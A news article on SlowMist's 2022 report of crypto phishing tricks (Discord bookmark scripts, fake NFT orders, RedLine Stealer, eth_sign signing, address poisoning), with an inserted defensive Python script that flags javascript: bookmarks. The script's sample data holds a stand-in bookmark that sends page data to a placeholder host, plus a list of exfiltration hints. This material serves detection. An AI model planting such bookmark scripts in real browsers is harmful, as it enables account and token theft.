5 Sneaky Tricks Crypto Phishing Scammers Used in the Last Year – SlowMist

Blockchain security firm SlowMist has highlighted five common phishing techniques used by crypto scammers on victims in 2022, including malicious browser bookmarks, bogus sales orders, and trojan malware spread on messaging app Discord.

It comes after the security firm logged a total of 303 blockchain security incidents during the year, with 31.6 percent of those incidents caused by phishing, rug pulls or other scams, according to a SlowMist blockchain security report released on January 9.

A pie chart of attack methods in 2022 as a percentage. Source: SlowMist

Malicious browser bookmarks

One of the phishing strategies uses bookmark managers, a feature found in most modern browsers.

SlowMist said the scammers used them to gain access to a project owner’s Discord account.

“By bookmarking JavaScript code through these phishing pages, attackers can potentially gain access to a Discord user’s information and take over a project owner’s account permissions,” the company wrote.

After guiding victims to add the malicious bookmark through a phishing page, the scammer waits until the victim clicks the bookmark while logged into Discord, which activates the implanted JavaScript code and sends the victim’s personal information to the Discord channel of the scammer.

During this process, the scammer can steal a victim’s Discord token (encryption of a Discord username and password) and thus gain access to their account, which allows them to post fake messages and links to more phishing scams by posing as the victim.
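A defender-side check for the bookmark trick described above, added here as an example and not taken from SlowMist's report: it walks a Chromium-style Bookmarks JSON file and lists every bookmark whose URL is a `javascript:` script rather than a web address. The sample data, the hint list and the function name `find_script_bookmarks` are assumptions made for illustration.

```python
import json

# Constructed sample in the layout of a Chromium "Bookmarks" file (JSON).
SAMPLE_BOOKMARKS = json.dumps({
    "roots": {
        "bookmark_bar": {"type": "folder", "name": "Bookmarks bar", "children": [
            {"type": "url", "name": "Docs", "url": "https://example.com/docs"},
            {"type": "url", "name": "Verify", "url":
             " JavaScript:fetch('https://collector.example.invalid/?t='+document.title)"},
            {"type": "folder", "name": "Tools", "children": [
                {"type": "url", "name": "Title", "url": "javascript:alert(document.title)"},
            ]},
        ]},
        "other": {"type": "folder", "name": "Other", "children": []},
    }
})

# Assumed heuristic: substrings suggesting the script reads page storage or sends data out.
NETWORK_OR_STORAGE_HINTS = ("fetch(", "xmlhttprequest", "sendbeacon", "localstorage", "webhook")

def find_script_bookmarks(bookmarks_json):
    """Return (folder path, name, hints) for every bookmark whose URL runs JavaScript."""
    findings = []

    def walk(node, path):
        if node.get("type") == "url":
            # Normalise before matching: the scheme is case-insensitive.
            url = node.get("url", "").strip().lower()
            if url.startswith("javascript:"):
                hints = [h for h in NETWORK_OR_STORAGE_HINTS if h in url]
                findings.append(("/".join(path), node.get("name", ""), hints))
        for child in node.get("children", []):
            walk(child, path + [node.get("name", "")])

    # Each root (bookmark bar, other, synced) is a folder node; skip non-folder entries.
    for root in json.loads(bookmarks_json).get("roots", {}).values():
        if isinstance(root, dict):
            walk(root, [])
    return findings

if __name__ == "__main__":
    for folder, name, hints in find_script_bookmarks(SAMPLE_BOOKMARKS):
        print(f"{folder}/{name}: javascript: bookmark, hints={hints}")
```

Any hit deserves a manual look; a script bookmark that also matches a network or storage hint is the pattern the report describes.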

“Zero Dollar Purchase” NFT phishing

Out of 56 serious NFT security breaches, 22 of them were the result of phishing attacks, according to SlowMist.

One of the most popular methods used by scammers tricks victims into signing over NFTs for virtually nothing through a fake sales order.

Once the victim signs the order, the scammer can then buy the user’s NFTs through a marketplace at a price determined by them.

“Unfortunately, it is not possible to deauthorize a stolen signature through sites like Revoke,” wrote SlowMist.

“However, you can deauthorize any previous pending orders you had set, which can help mitigate the risk of phishing attacks and prevent the attacker from using your signature.”

Trojan horse currency theft

According to SlowMist, this type of attack usually occurs via private messages on Discord where the attacker invites victims to participate in testing a new project, then sends a program in the form of a compressed file that contains an executable file of about 800 MB.

Once downloaded, the program scans for files containing key phrases such as “wallet” and uploads them to the attacker’s server.

“The latest version of RedLine Stealer also has the ability to steal cryptocurrency by scanning the digital currency wallet information installed on the local computer and uploading it to a remote control machine,” said SlowMist.

“In addition to stealing cryptocurrency, RedLine Stealer can also upload and download files, execute commands, and return periodic information about the infected computer.”

An example of RedLine Stealer in action. Source: SlowMist

“Blank check” eth_sign phishing

This phishing attack allows scammers to use your private key to sign any transaction they choose. After you link your wallet to a scam site, a signature request box with a red warning from MetaMask may appear.

After signing, attackers gain access to your signature, allowing them to create any data and ask you to sign it via eth_sign.

“This type of phishing can be very confusing, especially when it comes to authorization,” the company said.

Same final number transfer scam

For this scam, attackers airdrop small amounts of tokens, such as 0.01 USDT or 0.001 USDT, to victims, often with a similar address except for the last few digits, in hopes of tricking users into accidentally copying the wrong address from their transfer history.

An example of a phishing attempt with the same ending number. Source: SlowMist

The remainder of the 2022 report covered other blockchain security incidents throughout the year, including contract vulnerabilities and the loss of private keys.

There were approximately 92 attacks that exploited contract vulnerabilities during the year, totaling nearly $1.1 billion in losses due to flaws in the design of smart contracts and compromised programs.

Private key theft, on the other hand, accounted for about 6.6% of attacks and resulted in losses of at least $762 million, the most notable examples being the Ronin Bridge and Harmony’s Horizon Bridge hacks.